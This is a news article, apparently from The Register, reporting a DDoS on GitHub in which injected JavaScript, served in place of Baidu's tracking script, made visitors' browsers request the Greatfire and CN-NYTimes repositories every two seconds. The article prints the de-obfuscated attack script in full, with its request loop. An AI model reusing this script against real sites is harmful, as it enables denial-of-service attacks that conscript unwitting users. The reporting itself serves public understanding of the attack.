Data Center

Arrow

Cloud

GitHub jammed by injected JavaScript, servers whacked by DDoS

Users unwittingly add to chronic traffic congestion

GitHub's servers are being hammered by web traffic from an army of unwitting cyber-foot-soldiers.

It appears when thousands of people visit websites that serve ads and tracking code from Baidu – China's answer to Google – from outside the Middle Kingdom, network gateways on the Chinese border silently inject a JavaScript function into those websites' pages.

This simple code instructs browsers to stealthily connect to GitHub.com every two seconds, creating "an extremely large amount of traffic," the San Francisco-based upstart said.

The JS specifically targets two GitHub-hosted projects – Greatfire and CN-NYTimes – which help Chinese citizens circumvent The Great Firewall Of China. The firewall blocks things like VPNs and censors web traffic, hiding information on the Tiananmen Square massacre and so on.

GitHub said on Friday that the bursts in traffic, effectively a string of distributed denial-of-service attacks, are causing intermittent outages.

"We're aware that GitHub.com is intermittently unavailable for some users during the ongoing DDoS," GitHub said in a status update at 1549 UTC today.

"Restoring service for all users while deflecting attack traffic is our number one priority. We've deployed our volumetric attack defenses against an extremely large amount of traffic. Performance is stabilizing."

Hours earlier, the biz noted: "We've been under continuous DDoS attack for 24+ hours. The attack is evolving, and we're all hands on deck mitigating."

The outage ... GitHub's status updates today

According to a security researcher at Insight Labs, HTTP requests to hm.baidu.com/h.js are being hijacked by China's border gateways, which insert some semi-obfuscated JavaScript to attack the aforementioned GitHub repositories. The injected script looks like this, once unscrambled:

document.write("<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js">// <![CDATA[
\x3c/script>");
!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
startime = (new Date).getTime();
var count = 0;

function unixtime() {
    var a = new Date;
    return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}
url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
NUM = url_array.length;

function r_send2() {
    var a = unixtime() % NUM;
    get(url_array[a])
}

function get(a) {
    var b;
    $.ajax({
        url: a,
        dataType: "script",
        timeout: 1E4,
        cache: !0,
        beforeSend: function() {
            requestTime = (new Date).getTime()
        },
        complete: function() {
            responseTime = (new Date).getTime();
            b = Math.floor(responseTime - requestTime);
            3E5 > responseTime - startime && (r_send(b), count += 1)
        }
    })
}

function r_send(a) {
    setTimeout("r_send2()", a)
}
setTimeout("r_send2()", 2E3);

The Greatfire project provides links to cloud-hosted mirrors of websites – such as the BBC and Google's Blogger – that Chinese people can use to dodge the Great Firewall. While BBC.com is blocked, a cache of the broadcaster's pages on cloudfront.net is not, it seems. CN-NYTimes similarly mirrors the New York Times.

"A certain device at the border of China's inner network and the Internet has hijacked the HTTP connections went into China, replaced some javascript files from Baidu with malicious ones that would load [the GitHub pages] every two seconds," Insight Labs' Anthr@x wrote.

"In other words, even people outside China are being weaponized to target things the Chinese government does not like, for example, freedom of speech."

While there is no proof that the Chinese government was directly involved in the assault, other researchers, such as F-Secure's Mikko Hypponen, noted that someone, state or otherwise, wants these projects silenced. ®

Sponsored: Cyberespionage and your business